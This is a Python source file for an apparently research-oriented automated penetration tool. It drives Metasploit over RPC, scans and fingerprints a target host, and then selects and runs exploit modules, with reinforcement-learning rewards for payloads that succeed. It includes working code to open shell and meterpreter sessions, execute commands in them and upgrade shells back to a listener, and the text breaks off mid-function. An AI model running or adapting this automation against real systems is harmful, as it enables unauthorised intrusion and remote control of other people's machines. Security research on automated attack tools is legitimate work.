└── DeepExploit-GAILDPPO.py /DeepExploit-GAILDPPO.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import sys 4 | import os 5 | import time 6 | import re 7 | import copy 8 | import json 9 | import csv 10 | import codecs 11 | import random 12 | import ipaddress 13 | import configparser 14 | import msgpack 15 | import http.client 16 | import threading 17 | import numpy as np 18 | import pandas as pd 19 | import tensorflow as tf 20 | import matplotlib.pyplot as plt 21 | import datetime 22 | from bs4 import BeautifulSoup 23 | from docopt import docopt 24 | from keras.models import * 25 | from keras.layers import * 26 | from keras import backend as K 27 | from util import Utilty 28 | from modules.VersionChecker import VersionChecker 29 | from modules.VersionCheckerML import VersionCheckerML 30 | from modules.ContentExplorer import ContentExplorer 31 | from CreateReport import CreateReport 32 | # Warnning for TensorFlow acceleration is not shown. 33 | os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' 34 | 35 | # Index of target host's state (s). 36 | ST_OS_TYPE = 0 # OS types (unix, linux, windows, osx..). 37 | ST_SERV_NAME = 1 # Product name on Port. 38 | ST_SERV_VER = 2 # Product version. 39 | ST_MODULE = 3 # Exploit module types. 40 | ST_TARGET = 4 # target types (0, 1, 2..). 41 | # ST_STAGE = 5 # exploit's stage (normal, exploitation, post-exploitation). 42 | NUM_STATES = 5 # Size of state. 43 | NONE_STATE = None 44 | NUM_ACTIONS = 0 45 | 46 | # Reward 47 | R_GREAT = 10 # Successful of Stager/Stage payload. 48 | R_GOOD = 1 # Successful of Single payload. 49 | R_BAD = -1 # Failure of payload. 50 | 51 | # Stage of exploitation 52 | S_NORMAL = -1 53 | S_EXPLOIT = 0 54 | S_PEXPLOIT = 1 55 | 56 | # Label type of printing. 57 | OK = 'ok' # [*] 58 | NOTE = 'note' # [+] 59 | FAIL = 'fail' # [-] 60 | WARNING = 'warn' # [!] 61 | NONE = 'none' # No label. 62 | 63 | 64 | # Metasploit interface. 65 | class Msgrpc: 66 | def __init__(self, option=[]): 67 | self.host = option.get('host') or "127.0.0.1" 68 | self.port = option.get('port') or 55552 69 | self.uri = option.get('uri') or "/api/" 70 | self.ssl = option.get('ssl') or False 71 | self.authenticated = False 72 | self.token = False 73 | self.headers = {"Content-type": "binary/message-pack"} 74 | if self.ssl: 75 | self.client = http.client.HTTPSConnection(self.host, self.port) 76 | else: 77 | self.client = http.client.HTTPConnection(self.host, self.port) 78 | self.util = Utilty() 79 | 80 | # Read config.ini. 81 | full_path = os.path.dirname(os.path.abspath(__file__)) 82 | config = configparser.ConfigParser() 83 | try: 84 | config.read(os.path.join(full_path, 'config.ini')) 85 | except FileExistsError as err: 86 | self.util.print_message(FAIL, 'File exists error: {}'.format(err)) 87 | sys.exit(1) 88 | # Common setting value. 89 | self.msgrpc_user = config['Common']['msgrpc_user'] 90 | self.msgrpc_pass = config['Common']['msgrpc_pass'] 91 | self.timeout = int(config['Common']['timeout']) 92 | self.con_retry = int(config['Common']['con_retry']) 93 | self.retry_count = 0 94 | self.console_id = 0 95 | 96 | # Call RPC API. 97 | def call(self, meth, origin_option): 98 | # Set API option. 99 | option = copy.deepcopy(origin_option) 100 | option = self.set_api_option(meth, option) 101 | 102 | # Send request. 103 | resp = self.send_request(meth, option, origin_option) 104 | return msgpack.unpackb(resp.read()) 105 | 106 | def set_api_option(self, meth, option): 107 | if meth != 'auth.login': 108 | if not self.authenticated: 109 | self.util.print_message(FAIL, 'MsfRPC: Not Authenticated.') 110 | exit(1) 111 | if meth != 'auth.login': 112 | option.insert(0, self.token) 113 | option.insert(0, meth) 114 | return option 115 | 116 | # Send HTTP request. 117 | def send_request(self, meth, option, origin_option): 118 | params = msgpack.packb(option) 119 | resp = '' 120 | try: 121 | self.client.request("POST", self.uri, params, self.headers) 122 | resp = self.client.getresponse() 123 | self.retry_count = 0 124 | except Exception as err: 125 | while True: 126 | self.retry_count += 1 127 | if self.retry_count == self.con_retry: 128 | self.util.print_exception(err, 'Retry count is over.') 129 | exit(1) 130 | else: 131 | # Retry. 132 | self.util.print_message(WARNING, '{}/{} Retry "{}" call. reason: {}'.format( 133 | self.retry_count, self.con_retry, option[0], err)) 134 | time.sleep(1.0) 135 | if self.ssl: 136 | self.client = http.client.HTTPSConnection(self.host, self.port) 137 | else: 138 | self.client = http.client.HTTPConnection(self.host, self.port) 139 | if meth != 'auth.login': 140 | self.login(self.msgrpc_user, self.msgrpc_pass) 141 | option = self.set_api_option(meth, origin_option) 142 | self.get_console() 143 | resp = self.send_request(meth, option, origin_option) 144 | break 145 | return resp 146 | 147 | # Log in to RPC Server. 148 | def login(self, user, password): 149 | ret = self.call('auth.login', [user, password]) 150 | try: 151 | if ret.get(b'result') == b'success': 152 | self.authenticated = True 153 | self.token = ret.get(b'token') 154 | return True 155 | else: 156 | self.util.print_message(FAIL, 'MsfRPC: Authentication failed.') 157 | exit(1) 158 | except Exception as e: 159 | self.util.print_exception(e, 'Failed: auth.login') 160 | exit(1) 161 | 162 | # Keep alive. 163 | def keep_alive(self): 164 | self.util.print_message(OK, 'Executing keep_alive..') 165 | _ = self.send_command(self.console_id, 'version\n', False) 166 | 167 | # Create MSFconsole. 168 | def get_console(self): 169 | # Create a console. 170 | ret = self.call('console.create', []) 171 | try: 172 | self.console_id = ret.get(b'id') 173 | _ = self.call('console.read', [self.console_id]) 174 | except Exception as err: 175 | self.util.print_exception(err, 'Failed: console.create') 176 | exit(1) 177 | 178 | # Send Metasploit command. 179 | def send_command(self, console_id, command, visualization, sleep=0.1): 180 | _ = self.call('console.write', [console_id, command]) 181 | time.sleep(0.5) 182 | ret = self.call('console.read', [console_id]) 183 | time.sleep(sleep) 184 | result = '' 185 | try: 186 | result = ret.get(b'data').decode('utf-8') 187 | if visualization: 188 | self.util.print_message(OK, 'Result of "{}":\n{}'.format(command, result)) 189 | except Exception as e: 190 | self.util.print_exception(e, 'Failed: {}'.format(command)) 191 | return result 192 | 193 | # Get all modules. 194 | def get_module_list(self, module_type): 195 | ret = {} 196 | if module_type == 'exploit': 197 | ret = self.call('module.exploits', []) 198 | elif module_type == 'auxiliary': 199 | ret = self.call('module.auxiliary', []) 200 | elif module_type == 'post': 201 | ret = self.call('module.post', []) 202 | elif module_type == 'payload': 203 | ret = self.call('module.payloads', []) 204 | elif module_type == 'encoder': 205 | ret = self.call('module.encoders', []) 206 | elif module_type == 'nop': 207 | ret = self.call('module.nops', []) 208 | 209 | try: 210 | byte_list = ret[b'modules'] 211 | string_list = [] 212 | for module in byte_list: 213 | string_list.append(module.decode('utf-8')) 214 | return string_list 215 | except Exception as e: 216 | self.util.print_exception(e, 'Failed: Getting {} module list.'.format(module_type)) 217 | exit(1) 218 | 219 | # Get module detail information. 220 | def get_module_info(self, module_type, module_name): 221 | return self.call('module.info', [module_type, module_name]) 222 | 223 | # Get payload that compatible module. 224 | def get_compatible_payload_list(self, module_name): 225 | ret = self.call('module.compatible_payloads', [module_name]) 226 | try: 227 | byte_list = ret[b'payloads'] 228 | string_list = [] 229 | for module in byte_list: 230 | string_list.append(module.decode('utf-8')) 231 | return string_list 232 | except Exception as e: 233 | self.util.print_exception(e, 'Failed: module.compatible_payloads.') 234 | return [] 235 | 236 | # Get payload that compatible target. 237 | def get_target_compatible_payload_list(self, module_name, target_num): 238 | ret = self.call('module.target_compatible_payloads', [module_name, target_num]) 239 | try: 240 | byte_list = ret[b'payloads'] 241 | string_list = [] 242 | for module in byte_list: 243 | string_list.append(module.decode('utf-8')) 244 | return string_list 245 | except Exception as e: 246 | self.util.print_exception(e, 'Failed: module.target_compatible_payloads.') 247 | return [] 248 | 249 | # Get module options. 250 | def get_module_options(self, module_type, module_name): 251 | return self.call('module.options', [module_type, module_name]) 252 | 253 | # Execute module. 254 | def execute_module(self, module_type, module_name, options): 255 | ret = self.call('module.execute', [module_type, module_name, options]) 256 | try: 257 | job_id = ret[b'job_id'] 258 | uuid = ret[b'uuid'].decode('utf-8') 259 | return job_id, uuid 260 | except Exception as e: 261 | if ret[b'error_code'] == 401: 262 | self.login(self.msgrpc_user, self.msgrpc_pass) 263 | else: 264 | self.util.print_exception(e, 'Failed: module.execute.') 265 | exit(1) 266 | 267 | # Get job list. 268 | def get_job_list(self): 269 | jobs = self.call('job.list', []) 270 | try: 271 | byte_list = jobs.keys() 272 | job_list = [] 273 | for job_id in byte_list: 274 | job_list.append(int(job_id.decode('utf-8'))) 275 | return job_list 276 | except Exception as e: 277 | self.util.print_exception(e, 'Failed: job.list.') 278 | return [] 279 | 280 | # Get job detail information. 281 | def get_job_info(self, job_id): 282 | return self.call('job.info', [job_id]) 283 | 284 | # Stop job. 285 | def stop_job(self, job_id): 286 | return self.call('job.stop', [job_id]) 287 | 288 | # Get session list. 289 | def get_session_list(self): 290 | return self.call('session.list', []) 291 | 292 | # Stop session. 293 | def stop_session(self, session_id): 294 | _ = self.call('session.stop', [str(session_id)]) 295 | 296 | # Stop meterpreter session. 297 | def stop_meterpreter_session(self, session_id): 298 | _ = self.call('session.meterpreter_session_detach', [str(session_id)]) 299 | 300 | # Execute shell. 301 | def execute_shell(self, session_id, cmd): 302 | ret = self.call('session.shell_write', [str(session_id), cmd]) 303 | try: 304 | return ret[b'write_count'].decode('utf-8') 305 | except Exception as e: 306 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 307 | return 'Failed' 308 | 309 | # Get executing shell result. 310 | def get_shell_result(self, session_id, read_pointer): 311 | ret = self.call('session.shell_read', [str(session_id), read_pointer]) 312 | try: 313 | seq = ret[b'seq'].decode('utf-8') 314 | data = ret[b'data'].decode('utf-8') 315 | return seq, data 316 | except Exception as e: 317 | self.util.print_exception(e, 'Failed: session.shell_read.') 318 | return 0, 'Failed' 319 | 320 | # Execute meterpreter. 321 | def execute_meterpreter(self, session_id, cmd): 322 | ret = self.call('session.meterpreter_write', [str(session_id), cmd]) 323 | try: 324 | return ret[b'result'].decode('utf-8') 325 | except Exception as e: 326 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 327 | return 'Failed' 328 | 329 | # Execute single meterpreter. 330 | def execute_meterpreter_run_single(self, session_id, cmd): 331 | ret = self.call('session.meterpreter_run_single', [str(session_id), cmd]) 332 | try: 333 | return ret[b'result'].decode('utf-8') 334 | except Exception as e: 335 | self.util.print_exception(e, 'Failed: {}'.format(cmd)) 336 | return 'Failed' 337 | 338 | # Get executing meterpreter result. 339 | def get_meterpreter_result(self, session_id): 340 | ret = self.call('session.meterpreter_read', [str(session_id)]) 341 | try: 342 | return ret[b'data'].decode('utf-8') 343 | except Exception as e: 344 | self.util.print_exception(e, 'Failed: session.meterpreter_read') 345 | return None 346 | 347 | # Upgrade shell session to meterpreter. 348 | def upgrade_shell_session(self, session_id, lhost, lport): 349 | ret = self.call('session.shell_upgrade', [str(session_id), lhost, lport]) 350 | try: 351 | return ret[b'result'].decode('utf-8') 352 | except Exception as e: 353 | self.util.print_exception(e, 'Failed: session.shell_upgrade') 354 | return 'Failed' 355 | 356 | # Log out from RPC Server. 357 | def logout(self): 358 | ret = self.call('auth.logout', [self.token]) 359 | try: 360 | if ret.get(b'result') == b'success': 361 | self.authenticated = False 362 | self.token = '' 363 | return True 364 | else: 365 | self.util.print_message(FAIL, 'MsfRPC: Authentication failed.') 366 | exit(1) 367 | except Exception as e: 368 | self.util.print_exception(e, 'Failed: auth.logout') 369 | exit(1) 370 | 371 | # Disconnection. 372 | def termination(self, console_id): 373 | # Kill a console and Log out. 374 | _ = self.call('console.session_kill', [console_id]) 375 | _ = self.logout() 376 | 377 | 378 | # Metasploit's environment. 379 | class Metasploit: 380 | def __init__(self, target_ip='127.0.0.1'): 381 | self.util = Utilty() 382 | self.rhost = target_ip 383 | # Read config.ini. 384 | full_path = os.path.dirname(os.path.abspath(__file__)) 385 | config = configparser.ConfigParser() 386 | try: 387 | config.read(os.path.join(full_path, 'config.ini')) 388 | except FileExistsError as err: 389 | self.util.print_message(FAIL, 'File exists error: {}'.format(err)) 390 | sys.exit(1) 391 | # Common setting value. 392 | server_host = config['Common']['server_host'] 393 | server_port = int(config['Common']['server_port']) 394 | self.msgrpc_user = config['Common']['msgrpc_user'] 395 | self.msgrpc_pass = config['Common']['msgrpc_pass'] 396 | self.timeout = int(config['Common']['timeout']) 397 | self.max_attempt = int(config['Common']['max_attempt']) 398 | self.save_path = os.path.join(full_path, config['Common']['save_path']) 399 | self.save_file = os.path.join(self.save_path, config['Common']['save_file']) 400 | self.data_path = os.path.join(full_path, config['Common']['data_path']) 401 | if os.path.exists(self.data_path) is False: 402 | os.mkdir(self.data_path) 403 | self.plot_file = os.path.join(self.data_path, config['Common']['plot_file']) 404 | self.port_div_symbol = config['Common']['port_div'] 405 | 406 | # Metasploit options setting value. 407 | self.lhost = server_host 408 | self.lport = int(config['Metasploit']['lport']) 409 | self.proxy_host = config['Metasploit']['proxy_host'] 410 | self.proxy_port = int(config['Metasploit']['proxy_port']) 411 | self.prohibited_list = str(config['Metasploit']['prohibited_list']).split('@') 412 | self.path_collection = str(config['Metasploit']['path_collection']).split('@') 413 | 414 | # Nmap options setting value. 415 | self.nmap_command = config['Nmap']['command'] 416 | self.nmap_timeout = config['Nmap']['timeout'] 417 | self.nmap_2nd_command = config['Nmap']['second_command'] 418 | self.nmap_2nd_timeout = config['Nmap']['second_timeout'] 419 | 420 | # A3C setting value. 421 | self.train_worker_num = int(config['A3C']['train_worker_num']) 422 | self.train_max_num = int(config['A3C']['train_max_num']) 423 | self.train_max_steps = int(config['A3C']['train_max_steps']) 424 | self.train_tmax = int(config['A3C']['train_tmax']) 425 | self.test_worker_num = int(config['A3C']['test_worker_num']) 426 | self.greedy_rate = float(config['A3C']['greedy_rate']) 427 | self.eps_steps = int(self.train_max_num * self.greedy_rate) 428 | 429 | # State setting value. 430 | self.state = [] # Deep Exploit's state(s). 431 | self.os_type = str(config['State']['os_type']).split('@') # OS type. 432 | self.os_real = len(self.os_type) - 1 433 | self.service_list = str(config['State']['services']).split('@') # Product name. 434 | 435 | # Report setting value. 436 | self.report_test_path = os.path.join(full_path, config['Report']['report_test']) 437 | self.report_train_path = os.path.join(self.report_test_path, config['Report']['report_train']) 438 | if os.path.exists(self.report_train_path) is False: 439 | os.mkdir(self.report_train_path) 440 | self.scan_start_time = self.util.get_current_date() 441 | self.source_host= server_host 442 | 443 | self.client = Msgrpc({'host': server_host, 'port': server_port}) # Create Msgrpc instance. 444 | self.client.login(self.msgrpc_user, self.msgrpc_pass) # Log in to RPC Server. 445 | self.client.get_console() # Get MSFconsole ID. 446 | self.buffer_seq = 0 447 | self.isPostExploit = False # Executing Post-Exploiting True/False. 448 | 449 | # Create exploit tree. 450 | def get_exploit_tree(self): 451 | self.util.print_message(NOTE, 'Get exploit tree.') 452 | exploit_tree = {} 453 | if os.path.exists(os.path.join(self.data_path, 'exploit_tree.json')) is False: 454 | for idx, exploit in enumerate(com_exploit_list): 455 | temp_target_tree = {'targets': []} 456 | temp_tree = {} 457 | # Set exploit module. 458 | use_cmd = 'use exploit/' + exploit + '\n' 459 | _ = self.client.send_command(self.client.console_id, use_cmd, False) 460 | 461 | # Get target. 462 | show_cmd = 'show targets\n' 463 | target_info = '' 464 | time_count = 0 465 | while True: 466 | target_info = self.client.send_command(self.client.console_id, show_cmd, False) 467 | if 'Exploit targets' in target_info: 468 | break 469 | if time_count == 5: 470 | self.util.print_message(OK, 'Timeout: {0}'.format(show_cmd)) 471 | self.util.print_message(OK, 'No exist Targets.') 472 | break 473 | time.sleep(1.0) 474 | time_count += 1 475 | target_list = self.cutting_strings(r'\s*([0-9]{1,3}) .*[a-z|A-Z|0-9].*[\r\n]', target_info) 476 | for target in target_list: 477 | # Get payload list. 478 | payload_list = self.client.get_target_compatible_payload_list(exploit, int(target)) 479 | temp_tree[target] = payload_list 480 | 481 | # Get options. 482 | options = self.client.get_module_options('exploit', exploit) 483 | key_list = options.keys() 484 | option = {} 485 | for key in key_list: 486 | sub_option = {} 487 | sub_key_list = options[key].keys() 488 | for sub_key in sub_key_list: 489 | if isinstance(options[key][sub_key], list): 490 | end_option = [] 491 | for end_key in options[key][sub_key]: 492 | end_option.append(end_key.decode('utf-8')) 493 | sub_option[sub_key.decode('utf-8')] = end_option 494 | else: 495 | end_option = {} 496 | if isinstance(options[key][sub_key], bytes): 497 | sub_option[sub_key.decode('utf-8')] = options[key][sub_key].decode('utf-8') 498 | else: 499 | sub_option[sub_key.decode('utf-8')] = options[key][sub_key] 500 | 501 | # User specify. 502 | sub_option['user_specify'] = "" 503 | option[key.decode('utf-8')] = sub_option 504 | 505 | # Add payloads and targets to exploit tree. 506 | temp_target_tree['target_list'] = target_list 507 | temp_target_tree['targets'] = temp_tree 508 | temp_target_tree['options'] = option 509 | exploit_tree[exploit] = temp_target_tree 510 | # Output processing status to console. 511 | self.util.print_message(OK, '{}/{} exploit:{}, targets:{}'.format(str(idx + 1), 512 | len(com_exploit_list), 513 | exploit, 514 | len(target_list))) 515 | 516 | # Save exploit tree to local file. 517 | fout = codecs.open(os.path.join(self.data_path, 'exploit_tree.json'), 'w', 'utf-8') 518 | json.dump(exploit_tree, fout, indent=4) 519 | fout.close() 520 | self.util.print_message(OK, 'Saved exploit tree.') 521 | else: 522 | # Get exploit tree from local file. 523 | local_file = os.path.join(self.data_path, 'exploit_tree.json') 524 | self.util.print_message(OK, 'Loaded exploit tree from : {}'.format(local_file)) 525 | fin = codecs.open(local_file, 'r', 'utf-8') 526 | exploit_tree = json.loads(fin.read().replace('\0', '')) 527 | fin.close() 528 | return exploit_tree 529 | 530 | # Get target host information. 531 | def get_target_info(self, rhost, proto_list, port_info): 532 | self.util.print_message(NOTE, 'Get target info.') 533 | target_tree = {} 534 | if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False: 535 | # Examination product and version on the Web ports. 536 | path_list = ['' for idx in range(len(com_port_list))] 537 | # TODO: Crawling on the Post-Exploitation phase. 538 | if self.isPostExploit is False: 539 | # Create instances. 540 | version_checker = VersionChecker(self.util) 541 | version_checker_ml = VersionCheckerML(self.util) 542 | content_explorer = ContentExplorer(self.util) 543 | 544 | # Check web port. 545 | web_port_list = self.util.check_web_port(rhost, com_port_list, self.client) 546 | 547 | # Gather target url using Spider. 548 | web_target_info = self.util.run_spider(rhost, web_port_list, self.client) 549 | 550 | # Get HTTP responses and check products per web port. 551 | uniq_product = [] 552 | for idx_target, target in enumerate(web_target_info): 553 | web_prod_list = [] 554 | # Scramble. 555 | target_list = target[2] 556 | if self.util.is_scramble is True: 557 | self.util.print_message(WARNING, 'Scramble target list.') 558 | target_list = random.sample(target[2], len(target[2])) 559 | 560 | # Cutting target url counts. 561 | if self.util.max_target_url != 0 and self.util.max_target_url < len(target_list): 562 | self.util.print_message(WARNING, 'Cutting target list {} to {}.' 563 | .format(len(target[2]), self.util.max_target_url)) 564 | target_list = target_list[:self.util.max_target_url] 565 | 566 | # Identify product name/version per target url. 567 | for count, target_url in enumerate(target_list): 568 | self.util.print_message(NOTE, '{}/{} Start analyzing: {}' 569 | .format(count + 1, len(target_list), target_url)) 570 | self.client.keep_alive() 571 | 572 | # Check target url. 573 | parsed = util.parse_url(target_url) 574 | if parsed is None: 575 | continue 576 | 577 | # Get HTTP response (header + body). 578 | _, res_header, res_body = self.util.send_request('GET', target_url) 579 | 580 | # Cutting response byte. 581 | if self.util.max_target_byte != 0 and (self.util.max_target_byte < len(res_body)): 582 | self.util.print_message(WARNING, 'Cutting response byte {} to {}.' 583 | .format(len(res_body), self.util.max_target_byte)) 584 | res_body = res_body[:self.util.max_target_byte] 585 | 586 | # Check product name/version using signature. 587 | web_prod_list.extend(version_checker.get_product_name(parsed, 588 | res_header + res_body, 589 | self.client)) 590 | 591 | # Check product name/version using Machine Learning. 592 | web_prod_list.extend(version_checker_ml.get_product_name(parsed, 593 | res_header + res_body, 594 | self.client)) 595 | 596 | # Check product name/version using default contents. 597 | parsed = None 598 | try: 599 | parsed = util.parse_url(target[0]) 600 | except Exception as e: 601 | self.util.print_exception(e, 'Parsed error : {}'.format(target[0])) 602 | continue 603 | web_prod_list.extend(content_explorer.content_explorer(parsed, target[0], self.client)) 604 | 605 | # Delete duplication. 606 | tmp_list = [] 607 | for item in list(set(web_prod_list)): 608 | tmp_item = item.split('@') 609 | tmp = tmp_item[0] + ' ' + tmp_item[1] + ' ' + tmp_item[2] 610 | if tmp not in tmp_list: 611 | tmp_list.append(tmp) 612 | uniq_product.append(item) 613 | 614 | # Assemble web product information. 615 | for idx, web_prod in enumerate(uniq_product): 616 | web_item = web_prod.split('@') 617 | proto_list.append('tcp') 618 | port_info.append(web_item[0] + ' ' + web_item[1]) 619 | com_port_list.append(web_item[2] + self.port_div_symbol + str(idx)) 620 | path_list.append(web_item[3]) 621 | 622 | # Create target info. 623 | target_tree = {'rhost': rhost, 'os_type': self.os_real} 624 | for port_idx, port_num in enumerate(com_port_list): 625 | temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'target_path': '', 'exploit': []} 626 | 627 | # Get product name. 628 | service_name = 'unknown' 629 | for (idx, service) in enumerate(self.service_list): 630 | if service in port_info[port_idx].lower(): 631 | service_name = service 632 | break 633 | temp_tree['prod_name'] = service_name 634 | 635 | # Get product version. 636 | # idx=1 2.3.4, idx=2 4.7p1, idx=3 1.0.1f, idx4 2.0 or v1.3 idx5 3.X 637 | regex_list = [r'.*\s(\d{1,3}\.\d{1,3}\.\d{1,3}).*', 638 | r'.*\s[a-z]?(\d{1,3}\.\d{1,3}[a-z]\d{1,3}).*', 639 | r'.*\s[\w]?(\d{1,3}\.\d{1,3}\.\d[a-z]{1,3}).*', 640 | r'.*\s[a-z]?(\d\.\d).*', 641 | r'.*\s(\d\.[xX|\*]).*'] 642 | version = 0.0 643 | output_version = 0.0 644 | for (idx, regex) in enumerate(regex_list): 645 | version_raw = self.cutting_strings(regex, port_info[port_idx]) 646 | if len(version_raw) == 0: 647 | continue 648 | if idx == 0: 649 | index = version_raw[0].rfind('.') 650 | version = version_raw[0][:index] + version_raw[0][index + 1:] 651 | output_version = version_raw[0] 652 | break 653 | elif idx == 1: 654 | index = re.search(r'[a-z]', version_raw[0]).start() 655 | version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:] 656 | output_version = version_raw[0] 657 | break 658 | elif idx == 2: 659 | index = re.search(r'[a-z]', version_raw[0]).start() 660 | version = version_raw[0][:index] + str(ord(version_raw[0][index])) + version_raw[0][index + 1:] 661 | index = version.rfind('.') 662 | version = version_raw[0][:index] + version_raw[0][index:] 663 | output_version = version_raw[0] 664 | break 665 | elif idx == 3: 666 | version = self.cutting_strings(r'[a-z]?(\d\.\d)', version_raw[0]) 667 | version = version[0] 668 | output_version = version_raw[0] 669 | break 670 | elif idx == 4: 671 | version = version_raw[0].replace('X', '0').replace('x', '0').replace('*', '0') 672 | version = version[0] 673 | output_version = version_raw[0] 674 | temp_tree['version'] = float(version) 675 | 676 | # Get protocol type. 677 | temp_tree['protocol'] = proto_list[port_idx] 678 | 679 | if path_list is not None: 680 | temp_tree['target_path'] = path_list[port_idx] 681 | 682 | # Get exploit module. 683 | module_list = [] 684 | raw_module_info = '' 685 | idx = 0 686 | search_cmd = 'search name:' + service_name + ' type:exploit app:server\n' 687 | raw_module_info = self.client.send_command(self.client.console_id, search_cmd, False, 3.0) 688 | module_list = self.extract_osmatch_module(self.cutting_strings(r'(exploit/.*)', raw_module_info)) 689 | if service_name != 'unknown' and len(module_list) == 0: 690 | self.util.print_message(WARNING, 'Can\'t load exploit module: {}'.format(service_name)) 691 | temp_tree['prod_name'] = 'unknown' 692 | 693 | for module in module_list: 694 | if module[1] in {'excellent', 'great', 'good'}: 695 | temp_tree['exploit'].append(module[0]) 696 | target_tree[str(port_num)] = temp_tree 697 | 698 | # Output processing status to console. 699 | self.util.print_message(OK, 'Analyzing port {}/{}, {}/{}, ' 700 | 'Available exploit modules:{}'.format(port_num, 701 | temp_tree['protocol'], 702 | temp_tree['prod_name'], 703 | output_version, 704 | len(temp_tree['exploit']))) 705 | 706 | # Save target host information to local file. 707 | fout = codecs.open(os.path.join(self.data_path, 'target_info_' + rhost + '.json'), 'w', 'utf-8') 708 | json.dump(target_tree, fout, indent=4) 709 | fout.close() 710 | self.util.print_message(OK, 'Saved target tree.') 711 | else: 712 | # Get target host information from local file. 713 | saved_file = os.path.join(self.data_path, 'target_info_' + rhost + '.json') 714 | self.util.print_message(OK, 'Loaded target tree from : {}'.format(saved_file)) 715 | fin = codecs.open(saved_file, 'r', 'utf-8') 716 | target_tree = json.loads(fin.read().replace('\0', '')) 717 | fin.close() 718 | 719 | return target_tree 720 | 721 | # Get target host information for indicate port number. 722 | def get_target_info_indicate(self, rhost, proto_list, port_info, port=None, prod_name=None): 723 | self.util.print_message(NOTE, 'Get target info for indicate port number.') 724 | target_tree = {'origin_port': port} 725 | 726 | # Update "com_port_list". 727 | com_port_list = [] 728 | for prod in prod_name.split('@'): 729 | temp_tree = {'prod_name': '', 'version': 0.0, 'protocol': '', 'exploit': []} 730 | virtual_port = str(np.random.randint(999999999)) 731 | com_port_list.append(virtual_port) 732 | 733 | # Get product name. 734 | service_name = 'unknown' 735 | for (idx, service) in enumerate(self.service_list): 736 | if service == prod.lower(): 737 | service_name = service 738 | break 739 | temp_tree['prod_name'] = service_name 740 | 741 | # Get product version. 742 | temp_tree['version'] = float(0.0) 743 | 744 | # Get protocol type. 745 | temp_tree['protocol'] = 'tcp' 746 | 747 | # Get exploit module. 748 | module_list = [] 749 | raw_module_info = '' 750 | idx = 0 751 | search_cmd = 'search name:' + service_name + ' type:exploit app:server\n' 752 | raw_module_info = self.client.send_command(self.client.console_id, search_cmd, False, 3.0) 753 | module_list = self.cutting_strings(r'(exploit/.*)', raw_module_info) 754 | if service_name != 'unknown' and len(module_list) == 0: 755 | continue 756 | for exploit in module_list: 757 | raw_exploit_info = exploit.split(' ') 758 | exploit_info = list(filter(lambda s: s != '', raw_exploit_info)) 759 | if exploit_info[2] in {'excellent', 'great', 'good'}: 760 | temp_tree['exploit'].append(exploit_info[0]) 761 | target_tree[virtual_port] = temp_tree 762 | 763 | # Output processing status to console. 764 | self.util.print_message(OK, 'Analyzing port {}/{}, {}, ' 765 | 'Available exploit modules:{}'.format(port, 766 | temp_tree['protocol'], 767 | temp_tree['prod_name'], 768 | len(temp_tree['exploit']))) 769 | 770 | # Save target host information to local file. 771 | with codecs.open(os.path.join(self.data_path, 'target_info_indicate_' + rhost + '.json'), 'w', 'utf-8') as fout: 772 | json.dump(target_tree, fout, indent=4) 773 | 774 | return target_tree, com_port_list 775 | 776 | # Get target OS name. 777 | def extract_osmatch_module(self, module_list): 778 | osmatch_module_list = [] 779 | for module in module_list: 780 | raw_exploit_info = module.split(' ') 781 | exploit_info = list(filter(lambda s: s != '', raw_exploit_info)) 782 | os_type = exploit_info[0].split('/')[1] 783 | if self.os_real == 0 and os_type in ['windows', 'multi']: 784 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 785 | elif self.os_real == 1 and os_type in ['unix', 'freebsd', 'bsdi', 'linux', 'multi']: 786 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 787 | elif self.os_real == 2 and os_type in ['solaris', 'unix', 'multi']: 788 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 789 | elif self.os_real == 3 and os_type in ['osx', 'unix', 'multi']: 790 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 791 | elif self.os_real == 4 and os_type in ['netware', 'multi']: 792 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 793 | elif self.os_real == 5 and os_type in ['linux', 'unix', 'multi']: 794 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 795 | elif self.os_real == 6 and os_type in ['irix', 'unix', 'multi']: 796 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 797 | elif self.os_real == 7 and os_type in ['hpux', 'unix', 'multi']: 798 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 799 | elif self.os_real == 8 and os_type in ['freebsd', 'unix', 'bsdi', 'multi']: 800 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 801 | elif self.os_real == 9 and os_type in ['firefox', 'multi']: 802 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 803 | elif self.os_real == 10 and os_type in ['dialup', 'multi']: 804 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 805 | elif self.os_real == 11 and os_type in ['bsdi', 'unix', 'freebsd', 'multi']: 806 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 807 | elif self.os_real == 12 and os_type in ['apple_ios', 'unix', 'osx', 'multi']: 808 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 809 | elif self.os_real == 13 and os_type in ['android', 'linux', 'multi']: 810 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 811 | elif self.os_real == 14 and os_type in ['aix', 'unix', 'multi']: 812 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 813 | elif self.os_real == 15: 814 | osmatch_module_list.append([exploit_info[0], exploit_info[2]]) 815 | return osmatch_module_list 816 | 817 | # Parse. 818 | def cutting_strings(self, pattern, target): 819 | return re.findall(pattern, target) 820 | 821 | # Normalization. 822 | def normalization(self, target_idx): 823 | if target_idx == ST_OS_TYPE: 824 | os_num = int(self.state[ST_OS_TYPE]) 825 | os_num_mean = len(self.os_type) / 2 826 | self.state[ST_OS_TYPE] = (os_num - os_num_mean) / os_num_mean 827 | if target_idx == ST_SERV_NAME: 828 | service_num = self.state[ST_SERV_NAME] 829 | service_num_mean = len(self.service_list) / 2 830 | self.state[ST_SERV_NAME] = (service_num - service_num_mean) / service_num_mean 831 | elif target_idx == ST_MODULE: 832 | prompt_num = 